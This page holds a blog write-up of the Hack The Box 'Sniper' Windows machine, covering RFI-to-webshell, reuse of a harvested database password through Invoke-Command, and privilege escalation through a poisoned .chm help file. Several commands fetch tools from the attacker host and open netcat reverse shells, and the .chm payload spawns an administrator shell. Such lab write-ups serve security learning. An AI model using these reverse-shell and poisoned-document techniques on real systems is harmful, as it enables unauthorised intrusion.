<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Hack The Box : Sniper | gr4n173</title>
<meta name="generator" content="Jekyll v3.8.6" />
<meta property="og:title" content="Hack The Box : Sniper" />
<meta name="author" content="gr4n173>" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Here I will explain my path for Sniper box from Hack The Box." />
<meta property="og:description" content="Here I will explain my path for Sniper box from Hack The Box." />
<link rel="canonical" href="http://localhost:4000/2020/03/28/htb-sniper.html" />
<meta property="og:url" content="http://localhost:4000/2020/03/28/htb-sniper.html" />
<meta property="og:site_name" content="gr4n173" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-03-28T00:00:00+05:45" />
<script type="application/ld+json">
{"@type":"BlogPosting","url":"http://localhost:4000/2020/03/28/htb-sniper.html","headline":"Hack The Box : Sniper","dateModified":"2020-03-28T00:00:00+05:45","datePublished":"2020-03-28T00:00:00+05:45","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2020/03/28/htb-sniper.html"},"author":{"@type":"Person","name":"gr4n173>"},"description":"Here I will explain my path for Sniper box from Hack The Box.","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/public/images/blackflag.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="gr4n173" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">gr4n173<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color-cyan-hover" href="https://twitter.com/"><i class="fab fa-twitter"></i></a><a class="color-red-hover" href="https://gr4n173.github.io"><i class="fab fa-itch-io"></i></a><a class="color-purple-hover" href="https://github.com/gr4n173"><i class="fab fa-github"></i></a><a class="color-blue-hover" href="https://www.facebook.com/profile.php?id=100038644863435"><i class="fab fa-facebook"></i></a><a class="color-cyan-hover" href="https://discordapp.com/users/680705408297730058"><i class="fab fa-discord"></i></a><a class="color-red-hover" href="mailto:me.gr4n173@protonmail.com"><i class="fab fa-mailchimp"></i></a><a class="color-cyan-hover" href="https://www.hackthebox.eu/home/users/profile/60443"><i class="fab fa-itch-io"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <div class="author-box">

<img src="https://gravatar.com/avatar/6691d16a4bf77dcf1f54ee766349682a?s=256" class="author-avatar" />

Hi there, I am a nerd guy who loves everything in between Internet and Security . I reach out to people and teach about CyberSecurity. I like to play with electronics in my spare time so that I can automate my lifestyle . CTF | HTB | Pwn & Exploitation.

</div>

<div class="post">
  <h1 class="post-title">Hack The Box : Sniper</h1>
  
  <div class="post-tags">
      
      <a class="tag" href="/tag/windows/">windows</a>
      
      <a class="tag" href="/tag/SMB/">SMB</a>
      
      <a class="tag" href="/tag/.chm/">.chm</a>
      
      <a class="tag" href="/tag/Powershell/">Powershell</a>
      
      <a class="tag" href="/tag/nc.exe/">nc.exe</a>
      
      <a class="tag" href="/tag/webshell/">webshell</a>
      
      <a class="tag" href="/tag/Invoke/">Invoke</a>
      
      <a class="tag" href="/tag/nishang/">nishang</a>
      
      <a class="tag" href="/tag/htb/">htb</a>
      
  </div>
  
  <div class="post-date">Published on 28 Mar 2020</div>
  
  <div class="post-description">Here I will explain my path for Sniper box from Hack The Box.</div>
  
  <h2 id="htbsniper">HTB:Sniper</h2>

<p>Sniper box was easy box. It falls under windows and medium category. Here, everything was all about enumeration and webshell upload. I’ll approach this write-up how I solved it, along with the problems that I had to face during this box. At first I obtained the user flag by exploiting RFI using SMB and I got the unprivelege user shell to privelege by using powershell commands and with .chm exploit I got root.txt. I’ll show all my payload (including that didn’t work in initial deployment to get root).</p>

<h2 id="box-details">Box Details</h2>

<p><img src="/public/images/sniperdetail.png" alt="box_detail" /></p>

<p>In the above it’s ip was <code class="highlighter-rouge">10.10.14.151</code>, I added it to <code class="highlighter-rouge">/etc/hosts</code> as sniper.htb. Let’s solve this box.</p>

<h2 id="recon">Recon</h2>

<p>Let’s start with universal port scanner, <code class="highlighter-rouge">nmap</code> to see the open ports and <code class="highlighter-rouge">port 80</code> and <code class="highlighter-rouge">smb</code> service was opened.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Nmap 7.80 scan initiated Fri Mar 27 21:34:08 2020 as: nmap -sS -sC -sV -Pn -oA nmap.txt 10.10.10.151
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.41s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h03m03s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-27T22:53:18
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 27 21:35:52 2020 -- 1 IP address (1 host up) scanned in 103.56 seconds
</code></pre></div></div>

<h3 id="web-enumeration">Web Enumeration</h3>
<p>sniper.htb</p>

<p>After I noticed port <code class="highlighter-rouge">80</code> was opened I visited that site and got this as output.</p>

<p><img src="/public/images/sniper_htb.jpg" alt="sniperhtb" /></p>

<p>From above, it was a good delivery website. So I checked everypart of the website and found this directory as interesting <code class="highlighter-rouge">http://sniper.htb/blog/index.php</code> . Here I found language where I was able to change the language <code class="highlighter-rouge">http://sniper.htb/blog/?lang=blog-en.php</code> . This happens due to the RFI (Remote File Inclusion) vulnerability in the webservices.</p>

<h3 id="webshell">Webshell</h3>
<p>Since <code class="highlighter-rouge">Sniper</code> had <code class="highlighter-rouge">SMB(Server Mail Box)</code> service. So I combined with RFI to get a webshell. For that you can follow this link <a href="http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html">here</a>.</p>

<p><img src="/public/images/sniper_webshell.png" alt="webshell.jpg" /></p>

<p>Above you can see the webshell. So, now I used nc to get the actually shell. For that I had to upload <code class="highlighter-rouge">nc.exe</code> to the webshell. 
If you don’t have then you can download from <a href="https://github.com/gr4n173/tools.git">here</a>.</p>

<p>Now before uploading that I made a dir named <code class="highlighter-rouge">gr4n173</code><br />
you can see the pic below.</p>

<p><img src="/public/images/nc_uploaded.png" alt="nc_shell" /></p>

<p>then uploaded <code class="highlighter-rouge">nc</code> tool to that directory as:</p>

<p><img src="/public/images/upload_nc.png" alt="uploadnc" /></p>

<h3 id="unprivileged-shell">Unprivileged shell</h3>

<p>Now I setup a listener on and used the command of <code class="highlighter-rouge">nc</code> as:</p>

<p><img src="/public/images/reverse_shell.png" alt="reverse" /></p>

<h4 id="listener">Listener:</h4>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@gr4n173:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 50602
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\gr4n173&gt;whoami
whoami
nt authority\iusr
</code></pre></div></div>
<p>Here I was unable to run any commands, so I switched to powershell as:</p>

<h4 id="power-shell">Power shell</h4>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\gr4n173&gt;powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\gr4n173&gt; 
</code></pre></div></div>

<p>Then I found the <code class="highlighter-rouge">Chris</code> user. Since I m unprivelege user so no any permission was granted.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users&gt; ls
ls
    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----         4/9/2019   6:47 AM                Administrator                                                         
d-----        4/11/2019   7:04 AM                Chris                                                                 
d-r---         4/9/2019   6:47 AM                Public                                                                
</code></pre></div></div>
<p>Now I had to change the user from unprivileged to privileged for that I searched everypart of the dir and found the creds of user <code class="highlighter-rouge">chris</code> as <code class="highlighter-rouge">Chris:36mEAhz/B8xQ~2VM</code>.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\inetpub\wwwroot\user&gt; more db.php
more db.php
<span class="cp">&lt;?php</span>
<span class="c1">// Enter your Host, username, password, database below.</span>
<span class="c1">// I left password empty because i do not set password on localhost.</span>
<span class="nv">$con</span> <span class="o">=</span> <span class="nb">mysqli_connect</span><span class="p">(</span><span class="s2">"localhost"</span><span class="p">,</span><span class="s2">"dbuser"</span><span class="p">,</span><span class="s2">"36mEAhz/B8xQ~2VM"</span><span class="p">,</span><span class="s2">"sniper"</span><span class="p">);</span>
<span class="c1">// Check connection</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">mysqli_connect_errno</span><span class="p">())</span>
  <span class="p">{</span>
  <span class="k">echo</span> <span class="s2">"Failed to connect to MySQL: "</span> <span class="o">.</span> <span class="nx">mysqli_connect_error</span><span class="p">();</span>
  <span class="p">}</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>
<p>By combining creds and <code class="highlighter-rouge">Invoke-Command</code> I got the user shell. Before that I created the folder <code class="highlighter-rouge">files</code> and downloaded the <code class="highlighter-rouge">nc</code> tool inside. Since it’s 2020 as python2 died so I used python3 server as</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\gr4n173&gt; cd files
cd files
PS C:\gr4n173\files&gt; Invoke-Webrequest -Uri http://10.10.14.11:8000/nc.exe -OutFile nc.exe
Invoke-Webrequest -Uri http://10.10.14.11:8000/nc.exe -OutFile nc.exe
PS C:\gr4n173\files&gt; 
</code></pre></div></div>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@gr4n173:~var/www/html/pub$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.151 - - [28/Mar/2020 20:38:14] "GET /nc.exe HTTP/1.1" 200 -
</code></pre></div></div>

<p>Finally downloaded <code class="highlighter-rouge">nc.exe</code>. Now I used <code class="highlighter-rouge">creds</code> and <code class="highlighter-rouge">Invoke-Command</code> to know the if I can run the command as</p>

<h3 id="privilege-user">Privilege User</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\gr4n173\files&gt; $pass =cOnvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
$pass =cOnvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
PS C:\gr4n173\files&gt; $cred = New-Object System.Management.Automation.PSCredential(".\chris",$pass)
$cred = New-Object System.Management.Automation.PSCredential(".\chris",$pass)
PS C:\gr4n173\files&gt; Invoke-Command -Computer Sniper -ScriptBlock { whoami } -Credential $cred 
Invoke-Command -Computer Sniper -ScriptBlock { whoami } -Credential $cred 
sniper\chris
</code></pre></div></div>
<p>In above command, at first I defined a variable <code class="highlighter-rouge">$pass</code> which store the password and another variable <code class="highlighter-rouge">cred</code> for passing the <code class="highlighter-rouge">user</code> and <code class="highlighter-rouge">pass</code> to <code class="highlighter-rouge">Powershell</code> and last one gaves the output of command <code class="highlighter-rouge">whoami</code> in <code class="highlighter-rouge">Powershell</code>. Hence I can run the <code class="highlighter-rouge">command</code> .</p>

<h2 id="reverse-shell">Reverse shell</h2>

<p>So I used the <code class="highlighter-rouge">nc reverse shell</code> as with a listener on.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\gr4n173\files&gt; Invoke-Command -Computer Sniper -ScriptBlock { C:\gr4n173\files\nc.exe 10.10.14.11 4445 -e powershell } -Credential $cred 
Invoke-Command -Computer Sniper -ScriptBlock { C:\gr4n173\files\nc.exe 10.10.14.11 4445 -e powershell } -Credential $cred 
</code></pre></div></div>
<h5 id="listener-1">Listener:</h5>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@gr4n173:~$nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 50671
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Users\Chris\Documents&gt; hostname
hostname
Sniper
</code></pre></div></div>
<p>This way I got the user.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users\Chris\Desktop&gt; ls
ls
    Directory: C:\Users\Chris\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/11/2019   8:15 AM             32 user.txt                                                              


PS C:\Users\Chris\Desktop&gt; more user.txt
more user.txt
21f4d******************
</code></pre></div></div>

<hr />
<h2 id="user-to-root">User to Root</h2>

<p>For root I searched every part of the user shell and uncomplete <code class="highlighter-rouge">.chm</code> file was found inside Chris’s Downloads directory:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users\Chris\Downloads&gt; ls
ls
    Directory: C:\Users\Chris\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/11/2019   8:36 AM          10462 instructions.chm
</code></pre></div></div>

<h3 id="poisoning-chm">Poisoning .chm</h3>

<p>In order to poison, I used <code class="highlighter-rouge">Out-CHM.ps1</code> while  from <a href="https://github.com/samratashok/nishang">Nishang</a> which is quite Interesting git repo especially related to window.</p>

<p>I used nishand tool and opened it in powershell.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS: &gt; Import-Module .\Out-CHM.ps1
</code></pre></div></div>

<p>Now I used the powershell to bypasss the Antivirus security.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS: &gt; powershell.exe -ExecutionPolicy Bypass
</code></pre></div></div>

<p>Then I download the <code class="highlighter-rouge">nc64.exe</code> to the Chris’s Documents folder as</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS: &gt; Out-CHM -Payload "cd C:\Users\Chris\Documents;./nc64.exe
10.10.14.11 8888 -e powershell" -HHCPath "C:\Program Files (x86)\HTML
Help Workshop" 
</code></pre></div></div>
<p>Here, I defined the dir of <code class="highlighter-rouge">nc64.exe</code> and used <a href="https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7">this</a> to exploit. File name <code class="highlighter-rouge">doc.chm</code> was created and you can get here <a href="/public/files/doc.chm">file</a>. This way I created the poison of <code class="highlighter-rouge">.chm</code> file.</p>

<p>Now I downloaded the created file to user shell <code class="highlighter-rouge">Chris</code> with a listener on along with the <code class="highlighter-rouge">python3 server</code> in <code class="highlighter-rouge">/var/www/html/pub</code></p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users\Chris\Documents&gt; Invoke-Webrequest -Uri http://10.10.14.11:8000/doc.chm -OutFile doc.chm                                                                   
Invoke-Webrequest -Uri http://10.10.14.11:8000/doc.chm -OutFile doc.chm  
</code></pre></div></div>

<h2 id="root-shell">Root Shell</h2>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@gr4n173:~$nc -lvnp 8888                              
listening on [any] 8888 ...  
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 53447                 
Microsoft Windows [Version 10.0.17763.678]                                   
C:\Windows\system32&gt;whoami                                                   
sniper\administrator                                                         
</code></pre></div></div>
<p>This way I can read the <code class="highlighter-rouge">root.txt</code>file.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
PS C:\Users\Administrator\Desktop&gt; more root.txt     
5624caf********************     
</code></pre></div></div>

<p>This way I got the root of Sniper box and learned alot from this box. So I would like to thank creators of this box <code class="highlighter-rouge">MinatoTW &amp; felamos</code> for such an awesome box. Especially poisoning <code class="highlighter-rouge">.chm</code> was awesome.</p>

<p>I will be posting writeup of next box after box retired. I would like to Thank readers for being with me through out this writeup.</p>

<p>Feedback are really appreciated !!</p>

<p>Tweet about this writeup if you like.</p>

<p>You can see more blog at my medium here: <a href="https://medium.com/@gr4n173">gr4n173</a>.</p>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'gr4n173'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>


</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2020/07/11/ret2libc.html">
          Pwn Ret2Libc
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2020/05/16/htb-patents.html">
          Hack The Box: Patents
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2020/05/01/hackpack-ctf-pwn.html">
          HackPack CTF: Pwn Challenge
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/.chm/" class="set-1">.chm</a> <a href="/tag/bof/" class="set-1">BoF</a> <a href="/tag/explotation%26pwning/" class="set-1">Explotation&Pwning</a> <a href="/tag/invoke/" class="set-1">Invoke</a> <a href="/tag/lfi-posioning/" class="set-1">LFI-posioning</a> <a href="/tag/nosql/" class="set-1">Nosql</a> <a href="/tag/phpjuggler/" class="set-1">PhpJuggler</a> <a href="/tag/powershell/" class="set-1">Powershell</a> <a href="/tag/re/" class="set-1">RE</a> <a href="/tag/rop/" class="set-1">ROP</a> <a href="/tag/smb/" class="set-1">SMB</a> <a href="/tag/ssti/" class="set-1">SSTI</a> <a href="/tag/vscctf/" class="set-1">VSCCTF</a> <a href="/tag/virseccon/" class="set-1">VirSecCon</a> <a href="/tag/xxe/" class="set-1">XXE</a> <a href="/tag/binaryexploitation/" class="set-1">binaryexploitation</a> <a href="/tag/boltcms/" class="set-1">boltcms</a> <a href="/tag/csrftorce/" class="set-1">csrftorce</a> <a href="/tag/ctf/" class="set-5">ctf</a> <a href="/tag/ffuf/" class="set-1">ffuf</a> <a href="/tag/ftp/" class="set-1">ftp</a> <a href="/tag/fuzz/" class="set-1">fuzz</a> <a href="/tag/gdb/" class="set-1">gdb</a> <a href="/tag/git/" class="set-1">git</a> <a href="/tag/hackpackctf/" class="set-1">hackpackctf</a> <a href="/tag/htb/" class="set-5">htb</a> <a href="/tag/ipv6/" class="set-1">ipv6</a> <a href="/tag/jjs/" class="set-1">jjs</a> <a href="/tag/lfmserver/" class="set-1">lfmserver</a> <a href="/tag/linux/" class="set-4">linux</a> <a href="/tag/linxu/" class="set-1">linxu</a> <a href="/tag/lkm/" class="set-1">lkm</a> <a href="/tag/mongodb/" class="set-1">mongodb</a> <a href="/tag/nc.exe/" class="set-1">nc.exe</a> <a href="/tag/nephack3/" class="set-1">nephack3</a> <a href="/tag/nishang/" class="set-1">nishang</a> <a href="/tag/oauth2/" class="set-1">oauth2</a> <a href="/tag/pcap/" class="set-1">pcap</a> <a href="/tag/port-forward/" class="set-1">port-forward</a> <a href="/tag/postgres/" class="set-1">postgres</a> <a href="/tag/pwn/" class="set-2">pwn</a> <a href="/tag/pwnables/" class="set-1">pwnables</a> <a href="/tag/python/" class="set-1">python</a> <a href="/tag/rce/" class="set-1">rce</a> <a href="/tag/restic-server/" class="set-1">restic-server</a> <a href="/tag/ret2libc/" class="set-1">ret2libc</a> <a href="/tag/rsync/" class="set-1">rsync</a> <a href="/tag/scripting/" class="set-1">scripting</a> <a href="/tag/selenium/" class="set-1">selenium</a> <a href="/tag/server/" class="set-1">server</a> <a href="/tag/sqli/" class="set-1">sqli</a> <a href="/tag/steganography/" class="set-1">steganography</a> <a href="/tag/virseccon/" class="set-1">virseccon</a> <a href="/tag/webchallenge/" class="set-1">webchallenge</a> <a href="/tag/webshell/" class="set-1">webshell</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/whoami/" class="set-1">whoami</a> <a href="/tag/whois/" class="set-1">whois</a> <a href="/tag/windows/" class="set-1">windows</a></div>
  




      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
	  <center><script src="https://www.hackthebox.eu/badge/60443"></script> </center><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');
if (theme === 'undefined') {
   theme = "dark";
}
if (theme === "dark") {
	document.documentElement.setAttribute('data-theme', 'dark');
} else {
    document.documentElement.setAttribute('data-theme', 'light');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
